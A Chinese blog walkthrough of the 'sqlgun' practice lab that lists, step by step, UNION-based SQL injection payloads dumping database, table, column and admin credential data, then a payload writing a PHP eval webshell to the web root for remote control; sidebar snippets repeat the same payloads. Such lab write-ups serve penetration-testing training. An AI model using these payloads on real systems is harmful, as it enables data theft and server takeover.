sqlgun靶场攻略

最新推荐文章于 2024-10-15 13:06:56 发布
最新推荐文章于 2024-10-15 13:06:56 发布
阅读量184 收藏 2
点赞数 1
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75036923/article/details/142219315
版权

进入靶场界面 

输入框测试回显点

-1'union select 1,2,3#看看有木有回显点

 

查看数据库名

-1'union select 1,2,database()#

 

查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

 

查看admin表中列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

 

查看admin的账号和密码

-1'union select 1,2,group_concat(id,admin,password) from admin#

 

MD5解密密码为admin

扫面目录,没有后台登录界面,有一个phpinfo.php文件,访问获取绝对路径

 

写入一句话木马

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/1.php' #

 

使用蚁剑链接

 

一身傲骨@
关注
sqlgun新闻发布系统.7z
03-21
SQLGun新闻发布的系统概述】 SQLGun新闻发布系统是一款基于数据库技术构建的开源新闻发布软件,它主要功能是帮助企业或个人快速建立一个稳定、高效且易于管理的新闻发布平台。该系统的核心特性在于其强大的内容...
WMS与库存管理的比较
12-15
在IT行业中,仓库管理系统(Warehouse Management System,简称WMS)和库存管理是两个重要的概念,它们在企业物流和供应链管理中扮演着至关重要的角色。本文将深入探讨WMS与库存管理的区别、联系以及各自的优势,...
sqlgun靶场通关攻略
qq_65852138的博客
09-17 469
sqlgun靶场通关攻略
sqlgun靶场训练
2301_78031880的博客
09-13 615
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #-1' union select 1,group_concat(id,admin,pas
CISP-PTE CMS sqlgun靶场训练
sudamasami的博客
08-14 176
SQLGUNCMS 靶场训练
sqlgun靶场练习
kknifek的博客
09-13 669
1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞 2.有xss大概率也存在sql注入,测试到3的时候发现有回显 3.进一步得出库名 4.要get shell的话我们可以尝试写一句话木马进去,构建payload key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile ‘/var/www/html/1.php’# 5.访问我们写进去的1.php,确认木马已写入
sqlgun靶场漏洞挖掘
Nai_zui_jiang的博客
09-13 540
这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell。这里我们使用联合查询查到了他的数据库名,那么这里也就存在SQL注入了。进入首页首先看到一个搜索框,那么我们试一下xss。首先我们扫描目录,找到phpinfo页面。接下来我们尝试一下sql注入。用script弹了个一。成功getshell。
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 730
输入 -1' union select 1,2,3# 有回显可以查看数据库sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
CISP-PTE CMS sqlgun靶场渗透测试
2401_82451607的博客
09-13 656
CISP-PTE CMS sqlgun靶场渗透测试
CISP-PTE CMS 文章管理系统靶场练习
sudamasami的博客
08-15 331
点击后台管理 发现要登录账号密码 抓包 然后用burp跑一下弱口令 找到了两个账号admin/Admin 密码都是123456。登录账号成功后 点击留言管理 果然有xss窗口弹出 xss漏洞可以借助xss平台获取到管理员cookie。然后用order by 进行猜数 猜到order by 15的时候回显是正常的 说明列数为15。使用xss语句 发现成功弹出 这里存在一个xss漏洞 但是在这个地方的xss漏洞好像没什么用。这里存在xss漏洞那么这个留言板肯定也存在xss漏洞了 于是在留言版测试一下。
sqlguncms
qq_46540840的博客
07-14 1445
sqlguncms 我们这里以比较真实环境来说 那道网站后发现有输入框 ,而且上面有回显内容大大减少了 渗透的步骤 -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# -1' union select 1,group_concat(column_name),3 from information_schema.columns where tabl
基于PHP的sqlgun php新闻发布系统.zip
07-23
SQLGun可能是这个系统的名称,暗示它可能在数据库操作方面具有高效和灵活的特点。 【描述】"基于PHP的sqlgun php新闻发布系统.zip"描述简洁,主要强调了其基于PHP技术,并且是一个新闻发布的解决方案。这表明系统的...
PHP实例开发源码—sqlgun php新闻发布系统.zip
11-23
SQLgun新闻系统可能采用了这种架构,其中模型处理数据逻辑,视图负责展示,控制器协调二者。理解MVC可以帮助开发者更好地组织代码和分离关注点。 4. **新闻管理功能**:系统可能包括新闻的添加、编辑、删除、分类...
多模块新闻管理
03-24
多模块新闻管理系统首页 欢迎使用sqlgun新闻发布系统。 sqlgun新闻发布系统 1.0 现有功能: 前台css布局! 后台无限分类html发帖! 安装说明: sqlgunnews.sql数据库文件,mysql导入即可! 后台路径:admin/...
SQL调优指南及高级SQL技巧
Hellc007的博客
10-14 932
SQL调优是一个复杂的任务,需要对数据库结构、索引设计、查询逻辑、事务管理等多个方面的深入理解。通过运用上述高级技巧和应对实战问题的策略,可以有效提高SQL查询的性能,优化数据库的整体表现。希望这篇文章能为你的添彩。
【text2sql】基于上下文文学习的MCS-SQL框架在Spider和BIRD取得了新SOTA
m0_46686599的博客
10-11 832
研究背景:大型语言模型(LLMs)在文本到SQL(Text-to-SQL)任务中,通过上下文学习(ICL)方法取得了显著的性能提升,但与人类专家相比,性能仍有较大差距,尤其是在处理复杂数据库模式和查询的基准测试中。 研究方法:本研究提出了一种新方法,利用多个提示(multiple prompts)来探索更广泛的可能答案空间,并有效聚合这些答案。通过多提示强化数据库模式链接,生成多样化的候选SQL查询,并基于置信度分数过滤这些查询,最后通过多项选择(multiple-choice selection)获取最优
[SQL] 数据库图形化安装和使用
qq_45280097的博客
10-11 308
一 安装 1.1图形化安装 下载DataGrip安装包 点击此处 一直下一步即可。 点击免费使用。 进去界面后,选择新建一个项目 点击加号,创建一个Mysql连接。 输入Mysql的连接信息。 点击DownLoad下载Mysql的驱动 接下来点击创建的mysq项目中后面的三个点,选择要显示的哪些数据库 选择完成后点击刷新,这样就会显示出所需要显示的数据库了。 二 创建数据库和表 2.1 创建数据库 右键点击创建的Mysql项目->New->Schem
如何在 Jupyter Notebook 执行和学习 SQL 语句(上)—— 基本原理详解和相关库安装篇
qq_44117805的博客
10-14 1489
SQLite 是一个轻量级的数据库系统,适合本地小型项目。SQLAlchemy 是一个强大的数据库连接工具,可以在Jupyter中方便地运行SQL查询。帮助有jupyter的人懒得装SQL的人学习SQL一大利器!
class GenericRow(protected[sql] val values: Array[Any]) extends Row
最新发布
青春不流名
10-15 329
是 Scala 语言中的一行代码,定义了一个名为GenericRow的类,它继承自Row类。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值